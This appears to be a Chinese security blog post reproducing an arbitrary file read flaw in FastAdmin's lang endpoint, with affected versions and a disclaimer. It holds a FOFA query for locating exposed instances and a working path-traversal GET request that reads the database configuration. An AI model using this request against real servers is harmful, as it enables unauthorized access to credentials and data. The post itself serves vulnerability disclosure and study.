【产品介绍】
FastAdmin 后台框架开源且可以免费商用,一键生成 CRUD, FastAdmin 是一款基于 ThinkPHP 和 Bootstrap 的极速后台开发框架,基于Auth验证的权限管理系统,一键生成 CRUD,自动生成控制器、模型、视图、JS、语言包、菜单、回收站等。(Fast Admin 极速 后台 框架)Fastadmin框架 lang接口处存在任意文件读取漏洞,恶意攻击者可能利用该漏洞读取服务器上的敏感文件,例如客户记录、财务数据或源代码,导致数据泄露。
任意文件读取漏洞(Arbitrary File Read Vulnerability)是一种安全漏洞,它允许攻击者读取服务器上未经授权的文件内容。这种漏洞通常出现在应用程序的代码中,当应用程序没有正确地验证或限制用户输入,特别是文件路径时,就可能导致这种漏洞。
【FOFA】
app="FASTADMIN-框架"
【影响版本】
FastAdmin版本 < 1.3.4
![漏洞复现|FastAdmin 任意文件读取漏洞复现 FastAdmin 任意文件读取漏洞复现 PoC]()
GET /index/ajax/lang?lang=../../application/database HTTP/1.1
![漏洞复现|FastAdmin 任意文件读取漏洞复现 FastAdmin 任意文件读取漏洞复现 PoC]()
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
点赞
https://cn-sec.com/archives/3325319.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
评论